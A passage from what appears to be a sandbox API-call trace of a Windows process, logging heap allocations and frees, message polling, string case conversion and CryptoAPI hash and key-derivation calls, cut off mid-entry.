(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.896] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.897] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.897] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.897] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.897] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.897] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.897] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.898] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.898] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.898] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.898] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.899] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.899] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.899] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.899] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.900] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.900] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.901] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.901] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.901] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.901] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.901] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.902] CryptHashData (hHash=0xaa5760, pbData=0x24b1738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.902] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.903] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.903] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.904] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.904] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.904] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.904] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.904] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.904] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.904] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.904] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.905] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 